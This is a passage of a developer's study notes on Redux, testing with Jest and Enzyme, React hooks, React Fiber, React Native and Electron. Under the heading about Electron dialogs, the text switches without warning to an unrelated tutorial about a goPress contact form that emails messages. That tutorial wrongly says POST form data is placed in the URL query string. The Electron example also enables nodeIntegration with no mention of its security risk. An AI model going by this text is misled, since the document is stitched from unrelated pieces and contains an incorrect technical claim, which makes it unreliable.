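  dispatch(myActionSync(payload)); // must dispatch the SYNC version
};

store.dispatch(myActionAsync(42));
console.log(store.getState().payload); // 42
```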
Data transformations -------------------- Action creators are FREE TO MODIFY AND ADD ANY DATA TO THE ACTION PAYLOAD: export const myActionSync = (payload) => { const newPayload = someTransform(payload); return { type: MY_ACTION, payload: newPayload, ... }; }; You can also do this in the reducer itself. Better to do it in the action creator as it's more flexible - different transformations for different actions that modify the same data item in the store. (my opinion) Remember: Reducers run SYNCHRONOUS CODE only, and are part of core redux. Action creators CAN RUN ASYNCHRONOUS CODE as well as synchronous code, but require the thunk add-on. Some utility functions: ----------------------- const updateObject = (oldObject, updatedValues) => { return { ...oldObject, ...updatedValues }; };
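A runnable check of the immutable-update helpers from this and the earlier section (the sample state shape is made up):

```javascript
// updateObject from above: shallow copy plus overrides.
const updateObject = (oldObject, updatedValues) => {
  return {
    ...oldObject,
    ...updatedValues,
  };
};

const state = { counter: 10, items: ['a', 'b', 'c'] };

// Object update: the original state object is left untouched.
const nextState = updateObject(state, { counter: 11 });

// Array delete without mutation: filter returns a NEW array.
const itemIndexToDelete = 1;
const newItems = state.items.filter(
  (item, index) => index !== itemIndexToDelete
);

console.log(state.counter, nextState.counter, newItems); // 10 11 [ 'a', 'c' ]
```

Note both are shallow operations: `nextState.items` is still the SAME array object as `state.items`, which is exactly the caution about reference types above.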
Authentication
Typically, rather than a session, we get a TOKEN in a SPA, as the server is generally a stateless REST API. The token is stored in local browser storage. Use local browser storage: localStorage.getItem("string key") localStorage.setItem("string key", "string value") Note browser local storage is not super secure. It could be accessed using XSS attacks, but otherwise should only be accessible by code served in your domain (same-origin policy).
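localStorage only exists in browsers, but its tiny string-only API is easy to mimic, which shows the token flow and is also handy as a test double; the stand-in and the token value are invented:

```javascript
// In-memory stand-in for the browser's localStorage: same string-only
// getItem/setItem shape, so the token flow can run (and be tested) in Node.
const fakeLocalStorage = (() => {
  const data = {};
  return {
    setItem: (key, value) => { data[key] = String(value); },
    getItem: (key) => (key in data ? data[key] : null),
    removeItem: (key) => { delete data[key]; },
  };
})();

// After a successful login response, stash the token...
fakeLocalStorage.setItem('token', 'abc123');

// ...and read it back on the next page load / request.
console.log(fakeLocalStorage.getItem('token'));   // abc123
console.log(fakeLocalStorage.getItem('missing')); // null

// On logout, drop it.
fakeLocalStorage.removeItem('token');
console.log(fakeLocalStorage.getItem('token'));   // null
```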
Testing
Could use Selenium but can also use NodeJS packages which will simulate the browser, which could make for faster unit tests. Jest - Popular JS testing tool often used with ReactJS Also need a way of emulating React components without having to render an entire DOM. We still need some kind of fake DOM but don't want everything. React Test Utils can do this, or use Enzyme as developed by Airbnb - also recommended by the React team. npm install --save enzyme react-test-renderer enzyme-adapter-react-16 ^^^^^^^^^^^^^^^^^^^^^^^ This one has to be specific to your react version See: << Good for mocking AJAX calls for e.g. When naming a test for a component, put it in the same directory as the component. If the component file name is MyComp.js then the TEST MUST BE NAMED MyComp.test.js, as this will then be AUTOMATICALLY picked up and included in the testing. To run the tests just use npm run test Enzyme vs React Test Utils vs react-testing-library --------------------------------------------------- FROM: ReactTestUtils gives you the bare minimum to test a React component. I haven't seen it being used for big applications. Enzyme and react-testing-library are both good libraries that give you all the tools you need to test your application. They have two different philosophies though. Enzyme allows you to access the internal workings of your components. You can read and set the state, and you can mock children to make tests run faster. On the other hand, react-testing-library doesn't give you any access to the implementation details. It renders the components and provides utility methods to interact with them. The idea is that you should communicate with your application in the same way a user would. So rather than set the state of a component you reproduce the actions a user would do to reach that state. In my experience Enzyme is easier to grasp but in the long run, it's harder to maintain. 
react-testing-library forces you to write tests that are a bit more complex on average but it rewards you with higher confidence in your code. FROM: Enzyme is intended for unit/integration testing. Its API was designed to test the implementation. It offers custom renderer that doesn't require DOM (for shallow rendering), behaves differently from React renderer and allows things that are important for unit testing but aren't possible or straightforward with default renderer, like synchronous state updates, shallow rendering, disabling lifecycle methods, etc. react-testing-library is intended for blackbox integration/e2e tests. It uses React renderer and ReactTestUtils internally, requires real DOM because it's component's output that is asserted in tests, not internals. It doesn't provide facilities for isolated unit tests but it's possible to do this by mocking modules that contain component that need to be spied, mocked or stubbed by other means, notably jest.mock. react-dom/test-utils and react-test-renderer contain a subset of functionality, Enzyme and react-testing-library were built upon them. API is scarce and requires to write boilerplate code or custom utility functions for full-grown testing. React officially promotes Enzyme and react-testing-library as better alternatives. Testing Components ----------------- In the MyComp.test.js file you do not need to import the test specific libraries - they will be made available automatically by the test command. MyComp.test.js -------------- import React from 'react'; import { configure, shallow } from 'enzyme'; // ^^^^^^^ // Does a shallow rendering of the component under test - it will produce // kind-of "stubs" for the immediate children and thus PREVENTS rendering // an entire subtree - efficient! 
import Adapter from 'enzyme-adapter-react-16';
import MyComp from './MyComp';
import OtherComp from '...';

configure({adapter : new Adapter()}); // Connect Enzyme to our React version

describe( 'Description of what this test bundle file holds - just str for console', () => {
   //
   // DEFINE setup and teardown for this group of tests
   beforeAll( () => { ... } );
   afterAll( () => { ... } );

   //
   // DEFINE setup and teardown for each test
   //
   let wrapper;
   beforeEach( () => { wrapper = shallow(<MyComp/>); } );
   afterEach( () => { ... } );

   //
   // DO each test
   //
   it( 'Should ... describes an individual test - just str for console', () => {
      // Create an instance of the component as it would be rendered into the DOM
      // (without creating the entire DOM!) and then inspect it. Enzyme allows the
      // component to be "rendered" stand-alone, i.e., without the rest of the DOM.
      //
      // If wrapper wasn't defined in the setup for each test we'd do
      //    const wrapper = shallow(<MyComp/>);
      //
      // But it is, so...
      expect(wrapper.find(OtherComp)).toHaveLength(2);
      //             ^^^^^^^^^
      //             Note this is the JS function, NOT JSX!
   } );

   it( 'Should do something else when another property is set', () => {
      // If wrapper wasn't defined in the setup for each test we'd do
      //    const wrapper = shallow(<MyComp myAttr=Something/>);
      //
      // But it is, so...
      wrapper.setProps({myAttr : Something});
      expect(wrapper.find(...))...();
   } );
} )

Testing Containers
------------------
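This section is a stub; one common, framework-independent approach worth noting is to
pull a container's state-update logic out into plain functions so it can be unit tested
without rendering anything. A sketch (the function and field names are hypothetical,
not from any real component here):

```javascript
// Hypothetical state-update logic extracted from a container component so it
// can be tested without rendering. The container's event handlers would call
// these and pass the result to setState().
function addItem(state, itemName) {
  // Return a NEW state object rather than mutating - mirrors setState usage.
  return {
    ...state,
    items: [...state.items, { name: itemName, done: false }],
  };
}

function toggleItem(state, index) {
  return {
    ...state,
    items: state.items.map((item, i) =>
      i === index ? { ...item, done: !item.done } : item
    ),
  };
}

// Example usage, exactly as a plain unit test would exercise it:
let state = { items: [] };
state = addItem(state, 'write tests');
state = toggleItem(state, 0);
console.log(state.items[0]); // -> { name: 'write tests', done: true }
```

Tests written this way need no DOM, no Enzyme and no shallow rendering, which keeps
them fast; the container itself then only needs a thin smoke test.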
React Hooks (React >= 16.8)
Do not confuse with life-cycle hooks like componentDidMount(), which are associated
solely with class based components.

React hooks allow functional components to be used *everywhere*. React hooks do for
functional components what state and the lifecycle hooks do for class based components.
I.e., HOOKS REPLACE CLASS-ONLY FUNCTIONALITY.

- Add state
- Share logic across components
- Implement functional lifecycle-like functionality.
- Can build custom hooks

React hooks are just JS functions that can only be used inside a functional component
or other hooks (you can write your own). All hooks are called useXXX(). E.g.
useState() etc.

See for motivation for hooks. From that page:.

Important Rules
===============
See:

RULE 1: Only Call Hooks at the Top Level (never in loops, conditions or nested
functions). This is because React relies on the order in which Hooks are called to
know which state corresponds to which useState() call.

By "calling a hook" it means calling the functions useState(), useEffect() etc. It
does NOT refer to using the state and state-setting-function they return! These can
be used as per normal!

RULE 2: Only Call Hooks from React Functions
You can only call Hooks from React function components and from custom Hooks.

USE eslint-plugin-react-hooks to help you enforce these rules:

    npm install eslint-plugin-react-hooks --save-dev

Read also:

useState()
==========
See:

import React, { useState } from 'react';
...
const defaultState = ...; // Any value - unlike class state it does not have to be an object
...
const MyFunctionalComponent = (props) => {
   // The state will survive re-renders.
   // Returns an array with *2* elements:
   //    0: the current state snapshot
   //    1: function to use to update the current state
   const [myState, mySetState] = useState(defaultState);
   ...
   // Use myState exactly as you would have used this.state in a class component.
   // Use mySetState like you would have used this.setState() in a class component,
   // BUT WARNING, it does NOT MERGE STATE FOR YOU!!!
   ...
   return (...);
};

WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING
vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
WARNING - useState's setState-like function DOES NOT MERGE STATE, IT **REPLACES** THE
CURRENT STATE WITH THE ONE YOU GIVE IT!
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING

Just like setState(), the useState() update function accepts a function instead of an
object when you need to update state based on the previous state, except that it
obviously doesn't receive any props. E.g.

    onChange = { (event) => mySetState( (prevMyState) => ( {newVal: prevMyState.val + X} ) ) }

WARNING - BE CAREFUL NOT TO CAPTURE PARAMETERS IN A CLOSURE

    onChange = { (event) =>
       mySetState( (prevMyState) => (
          {
             something: event.target.value, // <<<< ERROR. See description below code.
             newVal: prevMyState.val + X
          }
       ) )
    }

The problem is this:

1. The first onChange event fires and the onChange handler is called. It is passed a
   React synthetic event object, which is POOLED. The handler returns a function,
   which closes over the outer scope's environment, capturing the instance of the
   event from the event pool. It is this inner function that is the "problem" and
   creates the closure over the pooled synthetic event.
2. The second onChange event fires and executes the handler, passing in a different
   synthetic event object, which too gets captured in the closure created.
3. At some point React will deal with these events, but it can do so when it chooses.
   React may re-use the event object that we have closed over in a previous handler
   that is yet to be called, and when it is called it will see the new event state,
   not the one it is supposed to see.

There is no way to "release" React's synthetic event objects, so React has no way to
know if we are "holding" on to one in this way.
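The pitfall can be simulated in plain JS with no React at all - the `pooledEvent`
object below is a stand-in for a pooled synthetic event that React mutates and
re-uses:

```javascript
// Simulates React's event pooling: the SAME event object is mutated and
// re-used for each new event, so a deferred callback that closed over it
// sees the latest values, not the ones at capture time.
const pooledEvent = { target: { value: '' } };
const deferred = [];

function handleChange(event) {
  // WRONG: the deferred function closes over the pooled event object itself.
  deferred.push(() => event.target.value);

  // RIGHT: copy the pertinent data to a const first, close over the copy.
  const value = event.target.value;
  deferred.push(() => value);
}

pooledEvent.target.value = 'first';
handleChange(pooledEvent);
pooledEvent.target.value = 'second'; // the "pool" re-uses the same object

console.log(deferred[0]()); // -> 'second' : wrong, saw the re-used event
console.log(deferred[1]()); // -> 'first'  : right, the copied value survived
```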
The solution is: in the outer function, create const variables that copy the pertinent
event data and use these in the inner function. This way the event can be safely
re-used by React.

Overcoming complexities of setting state
----------------------------------------
Remember that the useState setState function DOES NOT MERGE THE STATE OBJECT FOR YOU.
Each time you must set the ENTIRE state.

You can make life simpler by registering multiple state objects. Just do:

    const [state1, state1SetFunc] = useState('');
    ....
    const [stateN, stateNSetFunc] = useState('');

This prevents having to use one big state object - you can have many little state
objects. Another way would be to write your own merge function for state updates, but
this would be harder to do.

State Update Batching
- - - - - - - - - - -
React will batch calls to setState hook functions to avoid unnecessary render cycles.
All state updates from one SYNCHRONOUS event handler are BATCHED TOGETHER. Thus, after
setting state, a lot like in class components, you can't immediately use the state to
get the new value.

useEffect()
===========
SEE:

import React, {useState, useEffect} from 'react';

useEffect allows one to manage side effects:

   The Effect Hook lets you perform side effects in function components. ... Data
   fetching, setting up a subscription, and manually changing the DOM in React
   components are all examples of side effects ... you can think of the useEffect Hook
   as componentDidMount, componentDidUpdate, and componentWillUnmount combined.

Side effects = logic that runs and does affect the application, but not in the current
render cycle, i.e., a future cycle. useEffect() runs AFTER EVERY render cycle.

You need useEffect() for exactly the same reason you don't trigger side effects in a
class based render function - you enter an infinite loop where each time you render
you create a side effect that modifies the state and triggers a re-render, and so on...
Use it like this:

    useEffect(FUNCTION, DEPENDENCIES-OF-FUNCTION);

So, your function is only run when the dependencies are modified. This is how you can
get it to act like componentDidMount or componentDidUpdate etc. The default is, as
mentioned, to run for every render cycle, but using dependencies you can change this...

Dependencies are variables you use outside of useEffect in your function. React hook
functions used in useEffect do not have to be considered external dependencies.

If you OMIT DEPENDENCIES-OF-FUNCTION then it runs FOR EVERY render cycle. If you make
it an empty list then it only runs for the very FIRST render - i.e., like
componentDidMount(). You can have multiple useEffect() calls, just like you do with
useState().

To use dependencies:

    let [myState, setMyState] = useState(myDefaultState);
    ...
    useEffect( ()=> {...}, [myState] ); //<<< This only executes when myState is changed.

This can allow us to split logic more elegantly. For example, if we fetch data based
on whether a checkbox is selected, our onChange event function can just manage the
checked state and we can split out the fetch logic into a useEffect() call with a
dependency on the checkbox state.

If you rely on props in an effect then declare them as a dependency - PROPS ARE ALSO
DEPENDENCIES if you use them. This effect is called when ANY prop changes:

    useEffect( () => {...}, [..., props]);

This effect will be called only when a certain key in the props changes:

    const { keyName } = props;
    ...
    useEffect( () => {...}, [..., keyName]);

Clean Up With useEffect():
- - - - - - - - - - - - - -
useEffect() can return a FUNCTION. A return value is not required, but if provided it
MUST be a function! The function returned is a CLEANUP function that will run before
the next time useEffect() runs. Note, this is NOT after the useEffect() runs, but
BEFORE the next useEffect() is run.
If useEffect() has [] as its dependencies, and therefore only runs once when the
component is first rendered, then the returned function is equivalent to
componentWillUnmount()!

useCallback()
=============
SEE:

Save a function so that it is not re-created. This can be very useful to get out of
entering infinite loops in render cycles. The course example was where a parent passes
a callback function, X, to a child that uses an effect that depends on X and calls X,
which modifies the parent state. Because, when the parent re-renders, the callback
function is redefined, the child will trigger its effect again, creating this infinite
loop. The way to stop this is to preserve the callback function across render cycles,
so that it doesn't change due to a render, and therefore the child won't call X
because of the prop callback function change.

Often used in combination with React.memo() and vice versa, when a function being
passed to a child as a callback would otherwise change, making the memoisation unable
to see the props as unchanged.

useMemo()
=========
Save a value so that it is not continually recreated. For example, a component has a
list of values. It is re-rendered, but not because of a change to the list. Thus, we
do not want to re-create the components that result from the list. Save the generated
components using `useMemo()`:

    const someComponentList = useMemo( () => {
        return <MyComponentList .../>
    }, [...dependencies...]);

useRef()
========
Allows use of references as you might do in class components.

    const myRef = useRef();
    ...
    <SomeElement ref={myRef} .../>

Remember to add the ref as a DEPENDENCY if you use it in an effect!

useReducer()
============
SEE:

    const [state, dispatch] = useReducer(reducer, initialArg, init);

An alternative to useState. Accepts a reducer of type (state, action) => newState,
and returns the current state paired with a dispatch method.
(If you're familiar with Redux, you already know how this works, although it is NOT
related to Redux otherwise.)

The reducer functions that you define are a lot like Redux reducers because they
accept the current state and an action. Based on the action and current state, the
reducer must return the new state.

    const myReducerForSomeThing = (currentThingState, action) => {
       switch(action.type) { // << The action is whatever we dispatched - its type isn't predefined
          case 'SOME ACTION':
             return newStateBasedOnCurrentThingStateForSomeAction;
          ...
          default:
             throw new Error("Should never happen - all actions should be handled");
       }
    };
    ...
    const MyElement = () => {
       const [myThingState, dispatch] = useReducer(myReducerForSomeThing, initialState);

       const someHandler = () => {
          dispatch({type: "SOME ACTION", ...});
       }
    }

React will re-render the component WHENEVER YOUR REDUCER RETURNS NEW STATE.

Reducers can make things cleaner as all of the update logic is located in one place.
Makes a clearer flow of data.

For HTTP requests:
   Sending the request is an action.  Action = SEND. (But only update state, don't do
                                      the actual send.)
   Handling the reply.                Action = RESPONSE.
   Handling any errors.               Action = ERROR.

Reducers must be PURE FUNCTIONS:

   A pure function is a function which: Given the same input, will always return the
   same output. Produces no side effects. A dead giveaway that a function is impure
   is if it makes sense to call it without using its return value. For pure
   functions, that's a noop.

A pure function produces no side effects, which means that it can't alter any external
state. Therefore, you can't do AJAX requests from a reducer. Instead use ACTION
CREATORS.
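Because reducers are pure, they can be exercised in isolation by calling them directly,
no React required. A sketch (the action names and state shape are made up for
illustration):

```javascript
// A pure reducer in the (state, action) => newState shape used by useReducer().
const listReducer = (state, action) => {
  switch (action.type) {
    case 'ADD':
      // Never mutate: build and return a NEW state object.
      return { ...state, items: [...state.items, action.item] };
    case 'CLEAR':
      return { ...state, items: [] };
    default:
      throw new Error(`Unhandled action type: ${action.type}`);
  }
};

// Inside a component this would be driven by dispatch(); here we just call it:
let state = { items: [] };
state = listReducer(state, { type: 'ADD', item: 'milk' });
state = listReducer(state, { type: 'ADD', item: 'eggs' });
console.log(state.items); // -> ['milk', 'eggs']
state = listReducer(state, { type: 'CLEAR' });
console.log(state.items); // -> []
```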
useContext()
============
Is the equivalent hook to the class context setup using the member variable
`static contextType = ...;`

You build the provider as per normal. Instead of contextType, now do:

    import { MyContext } from ...;

    const SomeComponent = props => {
       const myContext = useContext(MyContext);
    };

CUSTOM HOOKS
============
SEE:

   Hooks are a new addition in React 16.8. They let you use state and other React
   features without writing a class.

* Share logic that influences component state across many different components.
* Custom hooks should always be named `useXXXX`.
* Inside hook functions you can use stateful features like useState() or useEffect(),
  for example. The stateful logic is reusable but the data it manipulates is specific
  to the component using the custom hook :)
Deploying To The Web
1. Remember to add the basename attribute to <BrowserRouter/> if the app is not being
   served from the root of the domain it is hosted on. If serving from the root there
   is no need, but if serving from a sub-path then you need
   <BrowserRouter basename="/apps/app1/">...</BrowserRouter>.
2. Build and optimise the site using npm run build (in your project directory).
3. The server must *always* serve the index.html file, even for 404 cases! The server
   gets the paths before the React app gets the path, and the server won't know the
   app paths!!
4. Upload the build artifacts from step 2 to a static server (Firebase, GitHub Pages,
   AWS S3 etc etc). I.e., the content of the build folder!

Remove "Download the React DevTool..." Message
----------------------------------------------
See:

    __REACT_DEVTOOLS_GLOBAL_HOOK__ = {
       supportsFiber: true,
       inject: function() {},
       onCommitFiberRoot: function() {},
       onCommitFiberUnmount: function() {},
    };
Webpack
A bundler, a file optimizer, file transformer and transpiler (modern ES to legacy, for
e.g.). Takes multiple HTML, JS, image etc etc resources and bundles them together with
optimization etc.

1. Create a folder to hold the project.
2. Get NPM to manage dependencies. In the project folder type:

       npm init

   Creates "package.json".

TODO - Complete section!
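A minimal config sketch of what the finished section would likely cover; the entry and
output names here are assumptions, and webpack option names can differ between major
versions:

```javascript
// webpack.config.js - minimal illustrative bundler config (assumed names).
const path = require('path');

module.exports = {
  mode: 'development',           // or 'production' for optimised output
  entry: './src/index.js',       // the root module webpack starts bundling from
  output: {
    path: path.resolve(__dirname, 'dist'),
    filename: 'bundle.js',       // the single bundled output file
  },
  module: {
    rules: [
      // Transpile modern ES to legacy via Babel (babel-loader must be installed).
      { test: /\.js$/, exclude: /node_modules/, use: 'babel-loader' },
    ],
  },
};
```

Run with `npx webpack` (assuming webpack and webpack-cli are installed as dev
dependencies).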
Third Party Components

- Really good - lots of pre-styled components.
- Build websites on any and all devices, beautiful & load fast. < 10KB.
- Parse, validate, manipulate and display dates and times in JS.
- React.js components for modular charting and data visualization.
React Fiber
The previous (before React 16) reconciliation algorithm was the "Stack Reconciler". It
was entirely synchronous and had only one phase.

Reconciliation - The algorithm React uses to diff one tree with another to determine
which parts need to be changed. When state changes, React generates an intermediate
virtual DOM and compares it against the previous virtual DOM before the state change.
It uses this diff to update select portions of the browser DOM, as opposed to updating
the whole browser DOM - efficient. The virtual DOMs are generated from Fiber's
INTERNAL INSTANCE TREE, which is a tree of React component instances and DOM nodes.

React Fiber is the new reconciliation algorithm included since React 16.

Reconciliation saves the developer from the need to keep track of what has changed and
change the browser DOM appropriately. All this "house keeping" is now done for the
developer.

Virtual DOM - The tree of IMMUTABLE React elements returned from the render methods.

Why the new reconciliation algorithm? Previously, when the rendering process started,
it could not be paused - the whole process had to be done in one go, in the browser
main thread. The result can be a laggy user experience. Unlike the previous algorithm,
Fiber has the ability to minimize and batch DOM changes to minimise how long the main
thread is held for. It manipulates the main thread to enable async behaviour.

Once a render method returns its sub-tree of React components, they are merged into
the tree of fiber nodes - Fiber analyses the components and creates corresponding
fiber nodes that it inserts into its own tree. I.e., every React element has a
corresponding fiber node. Unlike React elements, FIBERS ARE NOT RE-CREATED ON EVERY
RENDER! The Fiber data structures are, unlike the React components, mutable. They hold
component state and DOM state.

Fiber uses a LINKED LIST TREE TRAVERSAL ALGORITHM and an ASYNCHRONOUS model that uses
this list to process elements that have pending work associated with them.
The Fiber process has TWO TREES:

1. Current tree
   After the very first render, represents the state of the app used to render the UI.

2. Work-in-progress tree
   Built for the current update. Reflects the future app state that should eventually
   appear in the browser.

It has TWO main PHASES:

1. Reconcile
   Mark fiber nodes with (side) effects asynchronously. Build up the WIP tree and the
   list of changes to be made, but do NOT make those changes. This can be done
   asynchronously so that the main browser thread is not held for too long. It can be
   repeated/restarted multiple times as updates come in.

   It relies on a newer browser API called `requestIdleCallback`, which queues a
   function to be called during a browser's idle periods. It enables developers to
   perform background and low priority work on the main event loop, without impacting
   latency-critical events such as animation and input response. See

   Of course, IE doesn't support this at the time of writing, but Chrome, Edge,
   Firefox and Opera do.

   Using this API, React can do the reconciliation phase during the browser's idle
   period by splitting up its work into chunks and doing a chunk at a time. As it is
   called back, on each callback it can decide what chunk of work it wants to do, a
   lot like an OS scheduler would. The priorities are as follows:

      - synchronous  << HIGH
      - task
      - animation
      - high
      - low
      - offscreen    << LOW

   During this phase the following lifecycle hooks will be called:
      (UNSAFE_)componentWillMount
      (UNSAFE_)componentWillReceiveProps
      getDerivedStateFromProps
      shouldComponentUpdate
      (UNSAFE_)componentWillUpdate
      render

   Essentially, because, recall, JS is a single-threaded process, using
   `requestIdleCallback` React is able to fake a multi-threaded process using
   COOPERATIVE MULTITASKING (a.k.a. NON-PREEMPTIVE MULTITASKING). From Wikipedia:

      Cooperative multitasking, also known as non-preemptive multitasking, is a style
      of computer multitasking in which the operating system never initiates a context
      switch from a running process to another process.
      Instead, processes voluntarily yield control periodically or when idle or
      logically blocked in order to enable multiple applications to be run
      concurrently. This type of multitasking is called "cooperative" because all
      programs must cooperate for the entire scheduling scheme to work. In this
      scheme, the process scheduler of an operating system is known as a cooperative
      scheduler, having its role reduced down to starting the processes and letting
      them return control back to it voluntarily.

2. Commit
   This phase still has to be done synchronously, BUT the heavy lifting has been done
   in the previous phase, so this minimises the amount of time that the main browser
   thread is held for. This does the changes in the DOM - visible to the user.

   The following lifecycle hooks will be called:
      getSnapshotBeforeUpdate
      componentDidMount
      componentDidUpdate
      componentWillUnmount

Future?

Improve CPU utilisation using TIME SLICING:
   - Rendering is NON BLOCKING - yields to user input
   - Multiple updates at different priorities
   - Pre-render so as not to slow visible content

Improve IO using React Suspense:
   - Access async data (e.g. from a server) as easily as accessing sync data from a
     member
   - Pause a component render without blocking siblings
   - Precise control of loading states to reduce jitter

React Suspense
--------------
From the website:

   React 16.6 added a <Suspense> component that lets you "wait" for some code to load
   and declaratively specify a loading state (like a spinner) while waiting...
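The chunked, resumable style of the reconcile phase can be sketched in plain JS with a
generator - each `yield` is a point where a cooperative "scheduler" could hand control
back to the browser. This is an analogy only, not Fiber's actual implementation:

```javascript
// Splits a big job into resumable chunks, like Fiber's reconcile phase.
function* chunkedWork(items, chunkSize) {
  const results = [];
  for (let i = 0; i < items.length; i += chunkSize) {
    for (const item of items.slice(i, i + chunkSize)) {
      results.push(item * 2); // stand-in for "process one fiber node"
    }
    yield; // cooperative yield point - the browser could handle input here
  }
  return results;
}

// A toy scheduler: in a browser each job.next() call would be driven by a
// requestIdleCallback callback; here we just run chunks back to back.
function runToCompletion(job) {
  let step = job.next();
  while (!step.done) {
    step = job.next();
  }
  return step.value;
}

console.log(runToCompletion(chunkedWork([1, 2, 3, 4, 5], 2))); // -> [2, 4, 6, 8, 10]
```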
React Native
- The framework relies on the React core.
- Supports iOS and Android. Microsoft also supports a version for Windows. Canonical
  also seem to support a version for the Ubuntu Desktop.
- React Native bundles your JavaScript.
- Threads for UI layout and JavaScript, which is different to ReactJS web.
- Threads communicate through a "bridge". E.g. the JS thread will request elements to
  be rendered and the UI thread will render them and so on. This means, unlike in web
  React, that the JS thread can block but the UI thread will remain responsive.

SEE snack.expo.io

It's a nice little sandbox to play with React Native and see how it renders in a fake
phone.

Unfortunately it looks like an extra learning curve on top of learning how React
works. I wanted to try and change a large webapp to React Native, but loads of tags
need to be re-written. E.g. <div> tags become <View> tags, <span> -> <Text> and stuff
like this... so there would be some rework. Also the property names change too, like
onClick becomes onPress. Seems like a faff. If developing from scratch I might have
looked at this further, as it looks pretty powerful, but no dice here, so ending notes
on React Native.
Electron & React
Electron is a neat way of creating a NodeJS app that includes the Chromium browser to
run web apps on the desktop. It allows one to create CROSS PLATFORM apps.

Resources / References:
-----------------------
From the Electron docs:

   Electron consists of three main pillars:

   1. Chromium for displaying web content.
   2. Node.js for working with the local filesystem and the operating system.
   3. Custom APIs for working with often-needed OS native functions.

   Developing an application with Electron is like building a Node.js app with a web
   interface or building web pages with seamless Node.js integration.

Example:
--------
Had a little play with Electron by embedding my little toy epic-planner app () using
the resources referenced above.

1. npm install --save-dev electron

2. Add src/electron-main.js as described in the tutorials, including freeCodeCamp's
   instructions on adding the ability to run from the NPM server for development and
   packaged build files for release:

      const startUrl = process.env.ELECTRON_START_URL || url.format({
         pathname: path.join(__dirname, '../build/index.html'),
         protocol: 'file:',
         slashes: true
      });
      mainWindow.loadURL(startUrl);

   Remember to set nodeIntegration to true in the BrowserWindow's webPreferences
   option:

      mainWindow = new BrowserWindow({
         ...
         webPreferences: {
            nodeIntegration: true
         }
      });

3. Add the following additions to the package.json file:

         ...
      +  "main": "src/electron-main.js",
      +  "homepage": "./",
      +  "author": "James Hume",
      +  "description": "A bare-bones epic planning application",
         ...
         "scripts": {
            ....
      +     "electron": "electron .",
      +     "electron-dev": "set ELECTRON_START_URL= && electron .",
         }

   3.a The development version of the Electron app can be run by starting the NPM
       development server: `npm start` and by then running the Electron app:
       `npm run electron-dev`.
   3.b The production version of the Electron app requires Electron Forge...
       continue...

4. Install Electron-Forge (needs Git, so on Windows run from a Git Bash console):

      npx @electron-forge/cli import

5. `npm run build` the application in preparation.

6. On Windows it appears, to get the build to work correctly, the following addition
   must be made to the forge config in the package.json file:

      "config": {
         "forge": {
            "packagerConfig": {
      +        "asar": true
            },

7. On Windows, from a Git Bash terminal, `npm run make`.

8. Find your app in the "out" folder under the directory containing package.json.

Pretty frikin' awesome!! Just note, Electron Forge might change the "start" script in
your package.json file to `"start": "electron-forge start",`... just be aware.

If you want to access Node.js modules do the following: () use `window.require()`
instead of `require()`:

    const fs = window.require('fs');

Access full filenames from HTML input element
---------------------------------------------
From

Electron adds a path property to File objects, so you can get the real path from the
input element using:

    document.getElementById("myFile").files[0].path

In React just use a ref instead of getElementById!

Using Electron dialogs from React App
-------------------------------------
Now that you have a web site using a flat file system, you would like to get some feedback from your users. Adding Disqus is easy since it’s all JavaScript code added to the page, but it isn’t what you want. You want them to be able to email you directly so that you can reply just to them.
You could create an all JavaScript system to email directly from the user’s computer, but that leaves your email open to spammers able to retrieve it from your code and sell it to other spammers. Therefore, you need to hide your email address on the server.
This tutorial is about adding an email message system to your new PressCMS (i.e. phpPress, rubyPress, nodePress, and goPress). I am starting with the front-end and then addressing the back-end for each system. I am assuming you already have these servers on your system.
How to Create the Form in the Browser
Since the front-end code will be the same for each server, you will have to copy these new files to each of the server directories. Therefore, I will talk about the files in the path as referenced from the server directory.
Instead of adding form-specific styling to the theme, this form script has everything in one place. Create the file questions.html in the
site/parts directory for the web site with the following content:
<!-->
This creates a basic form asking for a full name (first and last name), email, and a message. This form uses regular expressions to ensure that the name and email address are valid. If whatever the user inputs into those fields does not match the regular expression in the
pattern directive, then the form will not be submitted. A popup will ask the user to properly fill in the field with the message in the
title parameter. Each input field has the
required attribute as well. This keeps blank forms from being submitted. This is the bare minimum data validation you should use on the front-end.
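The same checks can be expressed in plain JS. The regexes below are illustrative
assumptions only, since the form's actual pattern values are not reproduced here:

```javascript
// Hypothetical patterns mirroring the form's pattern attributes.
const namePattern = /^[A-Za-z'-]+\s+[A-Za-z'-]+$/; // first AND last name
const emailPattern = /^[^@\s]+@[^@\s]+\.[^@\s]+$/; // crude "looks like an email" shape

function validateForm(fields) {
  // Mirrors `required`: empty fields fail before any pattern is checked.
  if (!fields.name || !fields.email || !fields.message) return false;
  return namePattern.test(fields.name) && emailPattern.test(fields.email);
}

console.log(validateForm({ name: 'Jane Doe', email: 'jane@example.com', message: 'Hi' })); // -> true
console.log(validateForm({ name: 'Jane', email: 'jane@example.com', message: 'Hi' }));     // -> false
```

Remember that client-side checks like these are a convenience only; the server must
still validate and sanitize everything it receives.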
The
action directive in the
form element tells the web browser what address to submit the form data to. The
method directive tells the browser to send as a
post method. The form data will be placed into the URL of the post request to the server. This is a Query String. The server then processes the information in the query string.
In the
site/pages directory, create the file
contact.md and place this code:
### Contact Us This is a simple contact form. Please fill in your name, first and last, email address, and message. I will get back to you as soon as possible. Thanks. {{{question}}}
Once saved, you can try out the pages in the server. In your browser, open the page.
The Contact Us page will look like the above picture. Notice the highlighting of the Name field directly upon loading. The
autofocus directive creates this desired behavior. It is always good design to have the first field the user needs to type into focused automatically.
After sending the message, a confirmation message to the user would be nice. In the
site/pages directory, create the file
messagesent.md and place this code:
### Message was sent Thank you so much for taking time to send me a message. I will reply as soon as possible.
Just a simple message so that the user knows the message was properly sent. You can expand upon this as you like.
Processing the Form With goPress
To sanitize the message given by the user, I am using the Blue Monday library. To load that library on your system, you need to run this command line:
go get github.com/microcosm-cc/bluemonday
This will make the library available for your program. That is the only non-standard library needed.
Open the
goPressServer.go file and add this to the top of the file inside the
import () statement:
"fmt" "github.com/hoisie/web" "net/smtp" "github.com/microcosm-cc/bluemonday"
Emailing messages from the server requires these libraries. After the line that has
goPress.DefaultRoutes( function call, add the following code:
//
// Setup special route for our form processing.
//
goPress.SetPostRoute("/api/message", postMessage)
